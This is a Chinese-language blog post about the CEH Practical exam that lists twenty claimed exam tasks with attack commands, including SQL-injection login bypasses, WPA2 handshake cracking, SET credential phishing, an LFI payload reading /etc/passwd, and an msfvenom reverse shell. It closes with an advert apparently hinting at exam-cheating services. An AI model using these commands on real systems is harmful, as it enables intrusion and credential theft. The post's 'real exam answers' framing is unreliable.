CEH Practical 实战考试真题与答案
什么是 CEH Practical?
CEH Practical 是 EC-Council 推出的 Certified Ethical Hacker(CEH)认证项目中的一项高级动手实践考试。它不同于传统的理论考试,侧重于在真实环境中检验考生的实操能力。
CEH Practical 主要亮点
🎯 真实世界挑战:
模拟现实中的网络安全场景,你需要使用常见的工具和技术解决问题,就像一名真实的网络安全专家。
🧪 实验室环境:
考试在一个受控、安全的实验环境中进行,模拟真实网络、应用程序及漏洞。
🧠 测试技能领域包括:
-
信息收集与扫描
-
网络渗透测试
-
权限提升
-
Web 应用攻击
-
系统漏洞利用
-
渗透后技术
📋 考试结构:
-
时长: 6 小时
-
内容: 包含 20 个实战任务,涵盖多个领域
-
工具: Nmap、Wireshark、Metasploit 等实用安全工具
✅ 认证要求:
完成至少 70% 的挑战即可通过考试。
CEH Practical 的优势
-
展示实战能力: 证明你不仅懂原理,还能真正“动手操作”。
-
全球认可: 被广泛认可为渗透测试与网络安全岗位的核心认证。
-
填补理论与实践的差距: 不只是“知道怎么做”,更能“真正做到”。
-
提升职业发展: 打开高薪岗位通道,脱颖而出。
谁适合考 CEH Practical?
-
已从事网络安全工作的专业人员,想验证自己的实战能力
-
渴望从理论走向实践的道德黑客爱好者
-
想成为红队专家、渗透测试员或安全分析师的人
CEH Practical vs. 传统 CEH 理论考试对比表:
| 特性 | CEH 理论考试 | CEH Practical |
|---|---|---|
| 考试类型 | 选择题 | 动手实战任务 |
| 核心内容 | 理论知识 | 实操能力 |
| 考试时长 | 4 小时 | 6 小时 |
| 通过标准 | 60-85%(因地区不同) | 70% |
| 能力体现 | 知识水平 | 实战能力 |
最新 CEH Practical 实战题目与答案(附步骤解析)
1. 分析恶意网络流量
题目: 提供一个 .pcap 文件,分析是否存在攻击行为。
步骤:
-
使用 Wireshark 打开文件
-
过滤协议(如 http、ftp、telnet)
-
查找暴力破解、非法下载等异常行为
-
示例过滤语句:
ftp.request.command == "USER" || ftp.request.command == "PASS"
2. 扫描开放端口
题目: 使用 Nmap 扫描 IP 192.168.1.10 并识别开放服务。
命令:
bash
复制编辑
nmap -sS -sV 192.168.1.10
3. 利用 Web 文件上传漏洞获取权限
步骤:
-
上传一个反弹 shell(如
.php脚本) -
用 Burp Suite 拦截并修改请求
-
启动监听器:
nc -lvnp 4444 -
执行上传脚本获取 shell
4. 执行 SQL 注入绕过登录
payload 示例:
-
用户名字段输入:
' OR '1'='1' -- -
密码字段留空
5. 捕获并破解 WPA2 握手包
流程:
-
airmon-ng start wlan0 -
airodump-ng wlan0 -
aireplay-ng -0 1 -a [AP_MAC] -c [Client_MAC] wlan0 -
aircrack-ng -w wordlist.txt -b [AP_MAC] capture.cap
6. 使用 Nessus 扫描漏洞
-
创建新扫描任务,输入目标 IP
-
扫描后查看报告,寻找高危漏洞(如 CVE-2023-XXXX)
7. 使用 SET 执行凭据钓鱼
-
运行:
setoolkit -
选择
Social Engineering > Website Attack Vectors -
克隆钓鱼网站并收集凭据
8. 破解密码哈希值
-
使用
hashid识别哈希类型 -
使用
hashcat进行破解:
bash
复制编辑
hashcat -m [hash_mode] -a 0 [hash_file] [wordlist]
9. 检测 ARP 欺骗
-
使用
ARPwatch监控网络 -
识别相同 IP 出现多个 MAC 地址
10. 枚举 SMB 共享文件夹
bash
复制编辑
smbclient -L \\[IP] -U [用户名]
11. 使用 Netcat 进行 Banner 抓取
bash
复制编辑
nc -v [目标IP] 80
-
输入
GET / HTTP/1.1查看服务器信息
12. 使用 Dig 执行 DNS 枚举
bash
复制编辑
dig example.com ANY
-
检查 A、MX、NS、TXT 等记录
13. 使用 SQL 注入绕过登录
-
用户名输入:
' OR 1=1 -- -
密码留空
14. 使用 OpenVAS 进行漏洞扫描
-
配置并运行 OpenVAS
-
输入目标 IP,分析扫描结果
15. 使用 DirBuster 扫描隐藏目录
-
设置目标 URL
-
使用字典文件(如 common.txt)进行目录暴力破解
16. 使用 Burp Suite 抓取并分析 HTTP 流量
-
设置代理,配置浏览器
-
捕获请求,分析敏感信息(如 cookies、用户名等)
17. 破解加密 ZIP 文件
bash
复制编辑
zip2john file.zip > hash.txt john --wordlist=wordlist.txt hash.txt
18. 利用本地文件包含(LFI)漏洞
h
复制编辑
http://example.com/?file=../../../../etc/passwd
19. 使用 Ettercap 执行中间人攻击(MITM)
bash
复制编辑
echo 1 > /proc/sys/net/ipv4/ip_forward
-
启动 Ettercap 并执行 ARP 欺骗
20. 建立反向 Shell 连接
bash
复制编辑
msfvenom -p linux/x86/shell_reverse_tcp LHOST=[你的IP] LPORT=4444 -f elf > shell.elf nc -lvnp 4444
-
上传并执行 payload,获取 shell
Offsec考试券找我有折扣价,另有Offsec系列的保障班,保障意思您一定懂!
CEH免费学,评论区留言,一个个排队开通课程!